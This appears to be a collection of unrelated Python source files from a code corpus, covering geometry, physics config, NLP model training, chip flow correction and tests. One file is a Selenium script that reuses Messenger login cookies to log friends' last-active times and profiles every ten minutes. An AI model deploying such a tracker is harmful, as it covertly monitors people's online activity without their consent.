Z16 = Z15 - 1j * tan(alpha / 2) * self.H2
# Draw the left side with center P2, and X axis =(P2,P5), Y axis=(P2,P10)
Z3 = self.W4 * exp(1j * (pi / 2 - alpha)) + Z2
Z4 = (self.W4 + self.W5) * exp(1j * (pi / 2 - alpha)) + Z2
Z5 = (Rext - self.H1) * exp(1j * self.W1 / 2)
Z10 = (1j * self.H2) * exp(1j * (pi / 2 - alpha)) + Z2
Z9 = (1j * self.H2 + self.W4) * exp(1j * (pi / 2 - alpha)) + Z2
Z8 = (1j * self.H2 + self.W4 + self.W5) * exp(1j * (pi / 2 - alpha)) + Z2
Z7 = (1j * self.H2 + L) * exp(1j * (pi / 2 - alpha)) + Z2
# Draw the right side with center P25, X axis (P25,P23), Y axis(P25,P17)
Z24 = self.W6 * exp(-1j * (pi / 2 - alpha)) + Z25
Z23 = (self.W6 + self.W7) * exp(-1j * (pi / 2 - alpha)) + Z25
Z22 = (Rext - self.H1) * exp(-1j * self.W1 / 2)
Z17 = (-1j * self.H2) * exp(-1j * (pi / 2 - alpha)) + Z25
Z18 = (-1j * self.H2 + self.W6) * exp(-1j * (pi / 2 - alpha)) + Z25
Z19 = (-1j * self.H2 + self.W6 + self.W7) * exp(-1j * (pi / 2 - alpha)) + Z25
Z20 = (-1j * self.H2 + L) * exp(-1j * (pi / 2 - alpha)) + Z25
# Z6 is the intersection of the line [Z7,Z10] and Circle centre
# (0,0) radius Rext - H1
Zint = inter_line_circle(Z7, Z10, Rext - self.H1)
# Select the point with Re(Z) > 0
if Zint[0].real > 0:
Z6 = Zint[0]
else:
Z6 = Zint[1]
Z21 = Z6.conjugate()
point_dict = dict()
point_dict["Z1"] = Z1
point_dict["Z2"] = Z2
point_dict["Z3"] = Z3
point_dict["Z4"] = Z4
point_dict["Z5"] = Z5
point_dict["Z6"] = Z6
point_dict["Z7"] = Z7
point_dict["Z8"] = Z8
point_dict["Z9"] = Z9
point_dict["Z10"] = Z10
point_dict["Z11"] = Z11
point_dict["Z12"] = Z12
point_dict["Z13"] = Z13
point_dict["Z14"] = Z14
point_dict["Z15"] = Z15
point_dict["Z16"] = Z16
point_dict["Z17"] = Z17
point_dict["Z18"] = Z18
point_dict["Z19"] = Z19
point_dict["Z20"] = Z20
point_dict["Z21"] = Z21
point_dict["Z22"] = Z22
point_dict["Z23"] = Z23
point_dict["Z24"] = Z24
point_dict["Z25"] = Z25
point_dict["Z26"] = Z26
return point_dict
|
23944
|
import FWCore.ParameterSet.Config as cms
HEBRecHitGPUtoSoAProd = cms.EDProducer('HEBRecHitGPUtoSoA',
HEBRecHitGPUTok = cms.InputTag('HEBRecHitGPUProd'))
|
23966
|
import os
import sys
from collections import defaultdict
import datetime
import pickle
import re
import time
import json
from selenium import webdriver
def main():
driver = webdriver.Chrome() # Optional argument, if not specified will search path.
#load login cookie
driver.get('https://www.messenger.com')
cookies=pickle.load(open('data/logincookies.pkl','rb'))
for c in cookies:
driver.add_cookie(c)
driver.get('https://www.messenger.com')
#get page source
    source = driver.page_source  # keep as str so the string-pattern regexes below work on Python 3
#get last active times and add them to database
v=re.compile("lastActiveTimes\":(.*),\"chatNotif")
lolo=json.loads(v.findall(source)[0])
d=defaultdict(lambda:[0],json.load(open("data/lastActiveTimes.json",'r')))
for k in lolo:
if lolo[k]!=d[k][-1]:
d[k].append(lolo[k])
json.dump(d,open("data/lastActiveTimes.json",'w'))
#maintain up to date database of friends profiles
v=re.compile("shortProfiles\":(.*),\"nearby")
lala=json.loads(v.findall(source)[0])
d=json.load(open('data/shortProfiles.json','r'))
d.update(lala)
json.dump(d,open('data/shortProfiles.json','w'))
driver.quit()
if not os.path.exists('data/logincookies.pkl'):
print ('missing cookie. Have you run init.py?')
sys.exit()
while True:
main()
with open('data/lastScrapeTime.txt','a') as f:
f.write(str(datetime.datetime.now())+'\n')
time.sleep(600)
|
24008
|
from app.classes.bot import Bot
from . import base_commands, base_events
def setup(bot: Bot):
base_commands.setup(bot)
base_events.setup(bot)
|
24009
|
import model
from model import whole_foods_sale
from model import aldis_au_sale
from model import aldis_us_sale
from model import aldis_uk_sale
def go(inputs, store_name):
if store_name == 'WholeFoods':
final_df = whole_foods_sale.items_on_sale()
elif store_name == 'Aldi AU':
final_df = aldis_au_sale.items_on_sale()
elif store_name == 'Aldi US':
final_df = aldis_us_sale.items_on_sale()
    elif store_name == 'Aldi UK':
        final_df = aldis_uk_sale.items_on_sale()
    else:
        raise ValueError('Unknown store name: {}'.format(store_name))
    return final_df.to_html()
|
24030
|
from blueqat import Circuit, ParametrizedCircuit
def compare_circuit(c1: Circuit, c2: Circuit) -> bool:
return repr(c1) == repr(c2)
def test_parametrized1():
assert compare_circuit(
ParametrizedCircuit().ry('a')[0].rz('b')[0].subs([1.2, 3.4]),
Circuit().ry(1.2)[0].rz(3.4)[0])
def test_parametrized2():
assert compare_circuit(
ParametrizedCircuit().ry('a')[0].rz('b')[0].subs({'a': 1.2, 'b': 3.4}),
Circuit().ry(1.2)[0].rz(3.4)[0])
def test_parametrized3():
assert compare_circuit(
ParametrizedCircuit().subs([]),
Circuit()
)
|
24093
|
from encoder import Encoder
from decoder import Decoder
from parser import Parser
from baseline import *
from language_model import LanguageModel
from util import Reader
import dynet as dy
from misc import compute_eval_score, compute_perplexity
import os
initializers = {'glorot': dy.GlorotInitializer(),
'constant': dy.ConstInitializer(0.01),
'uniform': dy.UniformInitializer(0.1),
'normal': dy.NormalInitializer(mean = 0, var = 1)
}
optimizers = {
"sgd": dy.SimpleSGDTrainer,
"adam": dy.AdamTrainer,
"adadelta": dy.AdadeltaTrainer,
"adagrad": dy.AdagradTrainer
}
class Session(object):
def __init__(self, options):
self.reader = Reader(options.data_dir, options.data_augment)
self.options = options
def supervised_enc(self):
encoder = self.create_encoder()
if os.path.exists(self.options.result_dir + 'model_enc'):
self.load_encoder(encoder)
enc_trainer = optimizers[self.options.optimizer](encoder.model)
lr = self.options.lr #used only for sgd
i = 0
best_f1 = 0
print ('supervised training for encoder...')
for epoch in range(self.options.epochs):
sents = 0
total_loss = 0.0
train = self.reader.next_example(0)
train_size = len(self.reader.data[0])
for data in train:
s1, s2, s3, pos, act = data[0], data[1], data[2], data[3], data[4]
loss = encoder.train(s1, s2, s3, pos, act, self.options.enc_dropout)
sents += 1
if loss is not None:
total_loss += loss.scalar_value()
loss.backward()
if self.options.optimizer == 'sgd':
enc_trainer.update(lr)
else:
enc_trainer.update()
e = float(i) / train_size
if i % self.options.print_every == 0:
print('epoch {}: loss per sentence: {}'.format(e, total_loss / sents))
sents = 0
total_loss = 0.0
if i!=0 and i % self.options.save_every == 0:
print('computing loss on validation set...')
valid = self.reader.next_example(2) #fix this
valid_size = len(self.reader.data[2])
rf = open(self.options.result_dir+'result', 'w')
for vdata in valid:
s1, s2, s3, pos, act = vdata[0], vdata[1], vdata[2], vdata[3], vdata[4]
_, output, _ = encoder.parse(s1, s2, s3, pos)
rf.write(output + '\n')
rf.close()
f1 = compute_eval_score(self.options.result_dir)
if f1 > best_f1:
best_f1 = f1
print ('highest f1: {}'.format(f1))
print ('saving model...')
encoder.Save(self.options.result_dir + 'model_enc')
else:
lr = lr * self.options.decay
i += 1
def supervised_dec(self):
decoder = self.create_decoder()
if os.path.exists(self.options.result_dir + 'model_dec'):
self.load_decoder(decoder)
dec_trainer = optimizers[self.options.optimizer](decoder.model)
lr = self.options.lr #used only for sgd
i = 0
lowest_valid_loss = 9999
print ('supervised training for decoder...')
for epoch in range(self.options.epochs):
sents = 0
total_loss = 0.0
train = self.reader.next_example(0)
train_size = len(self.reader.data[0])
for data in train:
s1, s2, s3, pos, act = data[0], data[1], data[2], data[3], data[4]
loss, loss_act, loss_word = decoder.compute_loss(s3, act, self.options.dec_dropout)
sents += 1
if loss is not None:
total_loss += loss.scalar_value()
loss.backward()
if self.options.optimizer == 'sgd':
dec_trainer.update(lr)
else:
dec_trainer.update()
e = float(i) / train_size
if i % self.options.print_every == 0:
print('epoch {}: loss per sentence: {}'.format(e, total_loss / sents))
sents = 0
total_loss = 0.0
if i!=0 and i % self.options.save_every == 0:
print('computing loss on validation set...')
total_valid_loss = 0
valid = self.reader.next_example(1)
valid_size = len(self.reader.data[1])
for vdata in valid:
s1, s2, s3, pos, act = vdata[0], vdata[1], vdata[2], vdata[3], vdata[4]
valid_loss, _, _ = decoder.compute_loss(s3, act)
if valid_loss is not None:
total_valid_loss += valid_loss.scalar_value()
total_valid_loss = total_valid_loss * 1.0 / valid_size
if total_valid_loss < lowest_valid_loss:
lowest_valid_loss = total_valid_loss
print ('saving model...')
decoder.Save(self.options.result_dir + 'model_dec')
else:
lr = lr * self.options.decay
i += 1
def unsupervised_with_baseline(self):
decoder = self.create_decoder()
assert(os.path.exists(self.options.result_dir + 'model_dec'))
self.load_decoder(decoder)
encoder = self.create_encoder()
assert(os.path.exists(self.options.result_dir + 'model_enc'))
self.load_encoder(encoder)
baseline = self.create_baseline()
if os.path.exists(self.options.result_dir + 'baseline'):
self.load_baseline(baseline)
enc_trainer = optimizers[self.options.optimizer](encoder.model)
dec_trainer = optimizers[self.options.optimizer](decoder.model)
baseline_trainer = optimizers[self.options.optimizer](baseline.model)
lr = self.options.lr #used only for sgd
i = 0
lowest_valid_loss = 9999
print ('unsupervised training...')
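        # Added note: the loop below is a REINFORCE-style update with a learned
        # baseline. The encoder samples a parse `act`, the decoder scores the
        # sentence under that parse, and the reward is logpx = -dec_loss_word.
        # The decoder is updated on the reconstruction loss directly; the encoder
        # is updated on (logpx - logpxb) * enc_loss_act, where logpxb is the
        # baseline's prediction of the reward, used to reduce gradient variance.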
for epoch in range(self.options.epochs):
sents = 0
total_loss = 0.0
train = self.reader.next_example(0)
train_size = len(self.reader.data[0])
for data in train:
s1, s2, s3, pos, act = data[0], data[1], data[2], data[3], data[4]
sents += 1
# random sample
enc_loss_act, _, act = encoder.parse(s1, s2, s3, pos, sample=True)
_, dec_loss_act, dec_loss_word = decoder.compute_loss(s3, act)
# save reward
logpx = -dec_loss_word.scalar_value()
total_loss -= logpx
# reconstruction and regularization loss backprop to theta_d
dec_loss_total = dec_loss_word + dec_loss_act * dy.scalarInput(self.options.dec_reg)
dec_loss_total = dec_loss_total * dy.scalarInput(1.0 / self.options.mcsamples)
dec_loss_total.scalar_value()
dec_loss_total.backward()
# update decoder
if self.options.optimizer == 'sgd':
dec_trainer.update(lr)
else:
dec_trainer.update()
if self.options.enc_update > 0:
# compute baseline and backprop to theta_b
b = baseline(s3)
logpxb = b.scalar_value()
b_loss = dy.squared_distance(b, dy.scalarInput(logpx))
b_loss.value()
b_loss.backward()
# update baseline
if self.options.optimizer == 'sgd':
baseline_trainer.update(lr)
else:
baseline_trainer.update()
                    # policy and regularization loss backprop to theta_e
enc_loss_act = encoder.train(s1, s2, s3, pos, act)
enc_loss_policy = enc_loss_act * dy.scalarInput((logpx - logpxb) / len(s1))
enc_loss_total = enc_loss_policy * dy.scalarInput(self.options.enc_update) - enc_loss_act * dy.scalarInput(self.options.enc_reg)
enc_loss_total = enc_loss_total * dy.scalarInput(1.0 / self.options.mcsamples)
enc_loss_total.value()
enc_loss_total.backward()
# update encoder
if self.options.optimizer == 'sgd':
enc_trainer.update(lr)
else:
enc_trainer.update()
e = float(i) / train_size
if i % self.options.print_every == 0:
print('epoch {}: loss per sentence: {}'.format(e, total_loss / sents))
sents = 0
total_loss = 0.0
if i!=0 and i % self.options.save_every == 0:
print('computing loss on validation set...')
total_valid_loss = 0
valid = self.reader.next_example(1)
valid_size = len(self.reader.data[1])
for vdata in valid:
s1, s2, s3, pos, act = vdata[0], vdata[1], vdata[2], vdata[3], vdata[4]
_, _, valid_word_loss = decoder.compute_loss(s3, act)
if valid_word_loss is not None:
total_valid_loss += valid_word_loss.scalar_value()
total_valid_loss = total_valid_loss * 1.0 / valid_size
if total_valid_loss < lowest_valid_loss:
lowest_valid_loss = total_valid_loss
print ('saving model...')
encoder.Save(self.options.result_dir + 'model_enc')
decoder.Save(self.options.result_dir + 'model_dec')
baseline.Save(self.options.result_dir + 'baseline')
else:
lr = lr * self.options.decay
i += 1
def unsupervised_without_baseline(self):
decoder = self.create_decoder()
assert(os.path.exists(self.options.result_dir + 'model_dec'))
self.load_decoder(decoder)
encoder = self.create_encoder()
assert(os.path.exists(self.options.result_dir + 'model_enc'))
self.load_encoder(encoder)
enc_trainer = optimizers[self.options.optimizer](encoder.model)
dec_trainer = optimizers[self.options.optimizer](decoder.model)
lr = self.options.lr #used only for sgd
i = 0
lowest_valid_loss = 9999
print ('unsupervised training...')
for epoch in range(self.options.epochs):
sents = 0
total_loss = 0.0
train = self.reader.next_example(0)
train_size = len(self.reader.data[0])
for data in train:
s1, s2, s3, pos, act = data[0], data[1], data[2], data[3], data[4]
sents += 1
# max sample
enc_loss_act, _, act = encoder.parse(s1, s2, s3, pos, sample=False)
_, dec_loss_act, dec_loss_word = decoder.compute_loss(s3, act)
logpxb = -dec_loss_word.scalar_value()
total_loss -= logpxb
# random sample
enc_loss_act, _, act = encoder.parse(s1, s2, s3, pos, sample=True)
_, dec_loss_act, dec_loss_word = decoder.compute_loss(s3, act)
# save reward
logpx = -dec_loss_word.scalar_value()
# reconstruction and regularization loss backprop to theta_d
dec_loss_total = dec_loss_word + dec_loss_act * dy.scalarInput(self.options.dec_reg)
dec_loss_total = dec_loss_total * dy.scalarInput(1.0 / self.options.mcsamples)
dec_loss_total.scalar_value()
dec_loss_total.backward()
# update decoder
if self.options.optimizer == 'sgd':
dec_trainer.update(lr)
else:
dec_trainer.update()
if self.options.enc_update > 0:
                    # policy and regularization loss backprop to theta_e
enc_loss_act = encoder.train(s1, s2, s3, pos, act)
enc_loss_policy = enc_loss_act * dy.scalarInput((logpx - logpxb) / len(s1))
enc_loss_total = enc_loss_policy * dy.scalarInput(self.options.enc_update) - enc_loss_act * dy.scalarInput(self.options.enc_reg)
enc_loss_total = enc_loss_total * dy.scalarInput(1.0 / self.options.mcsamples)
enc_loss_total.value()
enc_loss_total.backward()
if self.options.optimizer == 'sgd':
enc_trainer.update(lr)
else:
enc_trainer.update()
e = float(i) / train_size
if i % self.options.print_every == 0:
print('epoch {}: loss per sentence: {}'.format(e, total_loss / sents))
sents = 0
total_loss = 0.0
if i!=0 and i % self.options.save_every == 0:
print('computing loss on validation set...')
total_valid_loss = 0
valid = self.reader.next_example(1)
valid_size = len(self.reader.data[1])
for vdata in valid:
s1, s2, s3, pos, act = vdata[0], vdata[1], vdata[2], vdata[3], vdata[4]
_, _, valid_word_loss = decoder.compute_loss(s3, act)
if valid_word_loss is not None:
total_valid_loss += valid_word_loss.scalar_value()
total_valid_loss = total_valid_loss * 1.0 / valid_size
if total_valid_loss < lowest_valid_loss:
lowest_valid_loss = total_valid_loss
print ('saving model...')
encoder.Save(self.options.result_dir + 'model_enc')
decoder.Save(self.options.result_dir + 'model_dec')
else:
lr = lr * self.options.decay
i += 1
def pretrain_baseline(self):
baseline = self.create_baseline()
if os.path.exists(self.options.result_dir + 'baseline'):
self.load_baseline(baseline)
baseline_trainer = optimizers[self.options.optimizer](baseline.model)
lr = self.options.lr #used only for sgd
i = 0
lowest_valid_loss = 9999
        print ('training baseline; for simplicity, the same training data is reused here...')
for epoch in range(self.options.epochs):
sents = 0
total_loss = 0.0
train = self.reader.next_example(0)
train_size = len(self.reader.data[0])
for data in train:
s1, s2, s3, pos, act = data[0], data[1], data[2], data[3], data[4]
sents += 1
loss = -baseline(s3)
if loss is not None:
total_loss += loss.scalar_value()
loss.backward()
if self.options.optimizer == 'sgd':
baseline_trainer.update(lr)
else:
baseline_trainer.update()
e = float(i) / train_size
if i % self.options.print_every == 0:
print('epoch {}: loss per sentence: {}'.format(e, total_loss / sents))
sents = 0
total_loss = 0.0
if i!=0 and i % self.options.save_every == 0:
print('computing loss on validation set...')
total_valid_loss = 0
valid = self.reader.next_example(1)
valid_size = len(self.reader.data[1])
for vdata in valid:
s1, s2, s3, pos, act = vdata[0], vdata[1], vdata[2], vdata[3], vdata[4]
valid_loss = -baseline(s3)
if valid_loss is not None:
total_valid_loss += valid_loss.scalar_value()
total_valid_loss = total_valid_loss * 1.0 / valid_size
if total_valid_loss < lowest_valid_loss:
lowest_valid_loss = total_valid_loss
print ('saving model...')
baseline.Save(self.options.result_dir + 'baseline')
else:
lr = lr * self.options.decay
i += 1
def parsing(self):
decoder = self.create_decoder()
assert(os.path.exists(self.options.result_dir + 'model_dec'))
self.load_decoder(decoder)
encoder = self.create_encoder()
assert(os.path.exists(self.options.result_dir + 'model_enc'))
self.load_encoder(encoder)
print('parsing...')
rf = open(os.path.join(self.options.result_dir, 'result'), 'w')
test = self.reader.next_example(2)
p = Parser(encoder, decoder)
for dataid, data in enumerate(test):
s1, s2, s3, pos, act = data[0], data[1], data[2], data[3], data[4]
output = p(s1, s2, s3, pos, self.options.nsamples)
rf.write(output + '\n')
rf.close()
f1 = compute_eval_score(self.options.result_dir)
print('bracket F1 score is {}'.format(f1))
def language_modeling(self):
decoder = self.create_decoder()
assert(os.path.exists(self.options.result_dir + 'model_dec'))
self.load_decoder(decoder)
encoder = self.create_encoder()
assert(os.path.exists(self.options.result_dir + 'model_enc'))
self.load_encoder(encoder)
print('computing language model score...')
test = self.reader.next_example(2)
lm = LanguageModel(encoder, decoder)
total_ll = 0
total_tokens = 0
for dataid, data in enumerate(test):
s1, s2, s3, pos, act = data[0], data[1], data[2], data[3], data[4]
if len(s1) <= 1:
continue
total_ll += lm(s1, s2, s3, pos, self.options.nsamples)
total_tokens += len(s1)
perp = compute_perplexity(total_ll, total_tokens)
print('perplexity: {}'.format(perp))
def create_decoder(self):
return Decoder(self.reader,
self.options.nlayers,
self.options.word_dim,
self.options.pretrained_dim,
self.options.action_dim,
self.options.dec_lstm_dim,
self.options.embedding_file)
def create_encoder(self):
return Encoder(self.reader,
self.options.nlayers,
self.options.word_dim,
self.options.pretrained_dim,
self.options.pos_dim,
self.options.action_dim,
self.options.enc_lstm_dim,
self.options.embedding_file)
def create_baseline(self):
baseline = None
if self.options.baseline == 'rnnlm':
baseline = LanguageModelBaseline(self.reader,
self.options.word_dim,
self.options.pretrained_dim,
self.options.dec_lstm_dim,
self.options.embedding_file)
elif self.options.baseline == 'rnnauto':
baseline = RNNAutoencBaseline(self.reader,
self.options.word_dim,
self.options.pretrained_dim,
self.options.dec_lstm_dim,
self.options.embedding_file)
elif self.options.baseline == 'mlp':
baseline = MLPAutoencBaseline(self.reader,
self.options.word_dim,
self.options.pretrained_dim,
self.options.embedding_file)
else:
            raise NotImplementedError("Baseline Not Implemented")
return baseline
def load_decoder(self, decoder):
decoder.Load(self.options.result_dir + 'model_dec')
def load_encoder(self, encoder):
encoder.Load(self.options.result_dir + 'model_enc')
def load_baseline(self, baseline):
baseline.Load(self.options.result_dir + 'baseline')
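# Hedged driver sketch (added; not part of the original file). Session expects an
# options namespace carrying every attribute read in the methods above (data_dir,
# data_augment, result_dir, optimizer, lr, epochs, enc_dropout, dec_dropout,
# print_every, save_every, decay, plus the model dimensions used by
# create_encoder/create_decoder). The subset below only illustrates the call
# pattern; it is not a complete, runnable configuration.
from types import SimpleNamespace
_demo_options = SimpleNamespace(
    data_dir='data/', data_augment=False, result_dir='results/',
    optimizer='adam', lr=0.001, epochs=30,
    enc_dropout=0.3, dec_dropout=0.3,
    print_every=100, save_every=1000, decay=0.75,
)
# session = Session(_demo_options)   # requires the full option set and a DyNet setup
# session.supervised_enc()           # or supervised_dec(), pretrain_baseline(), ...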
|
24106
|
import sys
from collections import defaultdict
import torch
from varclr.utils.infer import MockArgs
from varclr.data.preprocessor import CodePreprocessor
if __name__ == "__main__":
ret = torch.load(sys.argv[2])
vars, embs = ret["vars"], ret["embs"]
embs /= embs.norm(dim=1, keepdim=True)
embs = embs.cuda()
var2idx = dict([(var, idx) for idx, var in enumerate(vars)])
processor = CodePreprocessor(MockArgs())
Ks = [1, 5, 10, 25, 50, 100, 250, 500, 1000]
topk_succ = defaultdict(int)
tot = 0
with open(sys.argv[1], "r") as f:
for line in f:
try:
var1, var2 = line.strip().split()
except ValueError:
print("skpped: ", line)
def canon(var):
return "".join(
[
word.capitalize() if idx > 0 else word
for idx, word in enumerate(processor(var).split())
]
)
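            # Added note: canon() lower-camel-cases the preprocessor's word split;
            # e.g. if processor(var) yields "max value", canon returns "maxValue"
            # (assuming CodePreprocessor splits identifiers into space-separated words).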
var1, var2 = canon(var1), canon(var2)
if var1 not in var2idx or var2 not in var2idx:
print(f"variable {var1} or {var2} not found")
continue
tot += 1
for k in Ks:
result = torch.topk(embs @ embs[var2idx[var1]], k=k + 1)
topk_succ[k] += var2 in [vars[idx] for idx in result.indices][1:]
print(f"Total {tot} variable pairs")
for k in Ks:
print(f"Recall@{k} = {100 * topk_succ[k] / tot:.1f}")
|
24107
|
import os
import numpy as np
from . import imtools, datprops
from .datfile import DatFile
from .chiptype import ChipType
moduleDir = os.path.abspath( os.path.dirname( __file__ ) )
class FlowCorr:
def __init__( self, chiptype, xblock=None, yblock=None, rootdir='.', method='' ):
'''
Initialize a flowcorr object
chiptype: a ChipType object
xblock: The full-chip column origin; setting to None returns a full chip
yblock: The full-chip row origin; setting to None returns a full chip
rootdir: root directory to look for flowcorr files.
search will also look up a level, within the
module directory, and in the dats directory
        method: if specified, automatically loads the corresponding flowcorr
'buffer'
'file'
if advanced options need to be passed into the load functions,
                 they should be called separately with method being left empty
'''
self.chiptype = ChipType(chiptype)
self.xblock = xblock
self.yblock = yblock
self.searchpath = [ rootdir,
os.path.join( rootdir, '..' ),
os.path.join( moduleDir, '../dats' ),
moduleDir,
os.path.join( moduleDir, 'dats' ) ]
if method.lower() == 'buffer':
self.frombuffer()
elif method.lower() == 'file':
self.fromfile()
elif not method:
pass
else:
raise ValueError( 'Flowcorr method "%s" is undefined' % method )
def frombuffer(self, flow_file='C2_step.dat', force=False, framerate=15):
'''
Returns the flow correction measured from a buffered flow
        flow_file: measurement file used to calculate the flowcorr
force: calculate the data from raw, even if an existing analysis is present
framerate: fps
'''
try:
if force:
raise IOError
self.filename = os.path.join( self.searchpath[0], 'flowcorr_slopes.dat' )
self.flowcorr = datprops.read_dat( self.filename, 'flowcorr', chiptype=self.chiptype )
except IOError:
# Read the dat file
found = False
for dirname in self.searchpath:
self.filename = os.path.join( dirname, flow_file )
if os.path.exists( self.filename ):
found = True
break
if not found:
raise IOError( '%s was not found' % self.filename )
data = DatFile( self.filename, chiptype=self.chiptype )
# Calculate properties
self.flowcorr = data.measure_slope( method='maxslope' )
            self.time_offset = np.min(data.measure_t0( method='maxslope' )) # TODO: not very robust; we should shift t0 here and record the offset instead of trying to handle it later
self.pinned = data.measure_pinned()
# remove pins
self.flowcorr[ self.pinned ] = 1
# Save a few more variables
            self.t0 = data.measure_t0( method='maxslope' )
self.actpix = data.measure_actpix
self.phpoint = data.measure_plateau()
return self.flowcorr
def fromfile( self, fc_type ):
'''
Loads the flow correction from file based on the chip type and scales up from miniblocks to full chips or analysis blocks.
This method only differentiates based on thumbnail or full chip/analysis block. All other differences are rolled into ChipType.
fc_type: can be 'ecc' or 'wt'.
flowcorr file is defined by self.chiptype.flowcorr_<fc_type>
'''
# Thumbnails are enough different to have their own function
if self.chiptype.tn == 'self':
return self.tn_fromfile( fc_type )
# Spatial thumbnails are just subsampled data. We don't need special loading
# Calculate the size of the flowcorr files
xMiniBlocks = self.chiptype.chipC / self.chiptype.miniC
yMiniBlocks = self.chiptype.chipR / self.chiptype.miniR
# Set the flowcorr path starting local before using the default
for path in self.searchpath:
filename = os.path.join( path, '%s.dat' % getattr( self.chiptype, 'flowcorr_%s' % fc_type ) )
try:
flowcorr = datprops.read_dat( filename , metric='flowcorr' )
break
except IOError:
continue
        else:
            raise IOError( 'Could not find a flowcorr file' )
# Scale the flowcorr data to the entire well
sizes = [ ( 96, 168 ), # This is an unscaled P1-sized flowcorr file. This is the most likely size when reading fc_flowcorr.dat
( yMiniBlocks, xMiniBlocks ), # This is the historical per-chip file. This is ( 96, 168 ) for a P1/540 chip
( self.chiptype.chipR, self.chiptype.chipC ) ] # This is the pre-compiled value
try:
fc_xMiniBlocks = self.chiptype.fullchip.chipC / self.chiptype.fullchip.miniC
fc_yMiniBlocks = self.chiptype.fullchip.chipR / self.chiptype.fullchip.miniR
sizes.append( ( fc_yMiniBlocks, fc_xMiniBlocks ) )
sizes.append( ( self.chiptype.fullchip.chipR, self.chiptype.fullchip.chipC ) )
except AttributeError:
pass
for size in sizes:
try:
flowcorr = flowcorr.reshape( size )
break
except ValueError:
                # Keep going until you iterate through all possible sizes. If you still get an error, then die
if size == sizes[-1]:
                    print( 'Possible Sizes' )
                    print( sizes )
                    print( 'Elements' )
                    print( flowcorr.shape )
raise ValueError( 'Could not determine flowcorr size' )
continue
# Resize the image to the current size
if self.chiptype.burger is None:
# This is a standard resize operation
flowcorr = imtools.imresize( flowcorr, ( self.chiptype.chipR, self.chiptype.chipC ) )
elif self.chiptype.spatn != 'self':
# This is burger mode on a full size chip
flowcorr = imtools.imresize( flowcorr, ( self.chiptype.burger.chipR, self.chiptype.burger.chipC ) )
# Clip off the top and bottom
first = ( flowcorr.shape[0] - self.chiptype.chipR ) / 2
last = first + self.chiptype.chipR
flowcorr = flowcorr[ first:last, : ]
else:
# This is burger mode on a spatial thumbnail
# This has the effect of adding more rows beyond the 800 typically used for a spatial thumbnail
rows = self.chiptype.chipR * self.chiptype.burger.chipR / self.chiptype.fullchip.chipR
flowcorr = imtools.imresize( flowcorr, ( rows, self.chiptype.chipC ) )
# Clip off the top and bottom
first = ( flowcorr.shape[0] - self.chiptype.chipR ) / 2
last = first + self.chiptype.chipR
flowcorr = flowcorr[ first:last, : ]
# Reduce to a single analysis block
if ( self.xblock is not None and self.yblock is not None and
self.xblock != -1 and self.yblock != -1 ):
flowcorr = flowcorr[ self.yblock: self.chiptype.blockR + self.yblock,
self.xblock: self.chiptype.blockC + self.xblock ]
self.flowcorr = flowcorr
return flowcorr
def tn_fromfile( self, fc_type ):
'''
Gets the per-well flowcorrection for a STANDARD (not spatial) thumbnail
'''
# Calculate the size of the flowcorr files
xMiniBlocks = self.chiptype.chipC / self.chiptype.miniC
yMiniBlocks = self.chiptype.chipR / self.chiptype.miniR
# Set the flowcorr path starting local before using the default
for path in self.searchpath:
filename = os.path.join( path, '%s.dat' % getattr( self.chiptype, 'flowcorr_%s' % fc_type ) )
try:
flowcorr = datprops.read_dat( filename , metric='flowcorr' )
break
except IOError:
continue
        else:
            raise IOError( 'Could not find a flowcorr file' )
# Scale the flowcorr data to the entire well
sizes = ( ( 96, 168 ), # This is an unscaled P1-sized flowcorr file.
( 48, 96 ) , # This is an unscaled P0-sized flowcorr file.
( yMiniBlocks, xMiniBlocks ), # This is the historical thumbnail flowcorr (swapped x & y - STP 7/13/2015)
( self.chiptype.fullchip.chipR, self.chiptype.fullchip.chipC ) ) # This is the pre-compiled value
for size in sizes:
try:
flowcorr = flowcorr.reshape( size )
break
except ValueError:
                # Keep going until you iterate through all possible sizes. If you still get an error, then die
if size == sizes[-1]:
raise ValueError( 'Could not determine flowcorr size' )
continue
# Resize the image to the full chip size
if self.chiptype.burger is None:
# This is a standard resize operation based on the full chip
flowcorr = imtools.imresize( flowcorr, ( self.chiptype.fullchip.chipR, self.chiptype.fullchip.chipC ) )
else:
# This is burger mode on a regular thumbnail. Full chip is actually specified by burger and then we have to clip
flowcorr = imtools.imresize( flowcorr, ( self.chiptype.burger.chipR, self.chiptype.burger.chipC ) )
# Clip off the top and bottom
first = ( flowcorr.shape[0] - self.chiptype.fullchip.chipR ) / 2
last = first + self.chiptype.fullchip.chipR
flowcorr = flowcorr[ first:last, : ]
# Reduce to thumbnail data
tnflowcorr = np.zeros( ( self.chiptype.chipR, self.chiptype.chipC ) )
for r in range( self.chiptype.yBlocks ):
tn_rstart = r*self.chiptype.blockR
tn_rend = tn_rstart + self.chiptype.blockR
#fc_rstart = int( (r+0.5)*self.chiptype.fullchip.blockR ) - self.chiptype.blockR/2
            # use the middle of the block in case the thumbnail has a different number of yBlocks; center within the block
fc_rstart = int( (r+0.5)*(self.chiptype.fullchip.chipR/self.chiptype.yBlocks) ) - self.chiptype.blockR/2
fc_rend = fc_rstart + self.chiptype.blockR
for c in range( self.chiptype.xBlocks ):
tn_cstart = c*self.chiptype.blockC
tn_cend = tn_cstart + self.chiptype.blockC
fc_cstart = int( (c+0.5)*self.chiptype.fullchip.blockC ) - self.chiptype.blockC/2
fc_cend = fc_cstart + self.chiptype.blockC
tnflowcorr[ tn_rstart:tn_rend, tn_cstart:tn_cend ] = flowcorr[ fc_rstart:fc_rend, fc_cstart:fc_cend ]
self.flowcorr = tnflowcorr
return self.flowcorr
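# Hedged usage sketch (added; not part of the original module). Per the __init__
# docstring, passing method='file' or method='buffer' loads the correction at
# construction time; otherwise fromfile()/frombuffer() can be called later with
# custom arguments. The chiptype value and rootdir below are placeholder
# assumptions; fc_type must be 'ecc' or 'wt' as documented above.
#
#   fc = FlowCorr( chiptype, rootdir='/results/analysis' )
#   fullchip_corr = fc.fromfile( 'wt' )                                   # full-chip correction
#   block_corr = FlowCorr( chiptype, xblock=0, yblock=0 ).fromfile( 'wt' )  # one analysis block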
|
24147
|
import math
import tensorflow as tf
from mayo.log import log
from mayo.util import (
Percent, memoize_method, memoize_property, object_from_params)
from mayo.session.base import SessionBase
class Train(SessionBase):
mode = 'train'
def __init__(self, config):
super().__init__(config)
self._run_train_ops = True
self._setup_train_operation()
self._init()
self._checkpoint_epoch = ''
@memoize_property
def learning_rate(self):
params = self.config.train.learning_rate
lr_class, params = object_from_params(params)
if lr_class is tf.train.piecewise_constant:
            # `tf.train.piecewise_constant` takes the step through an argument
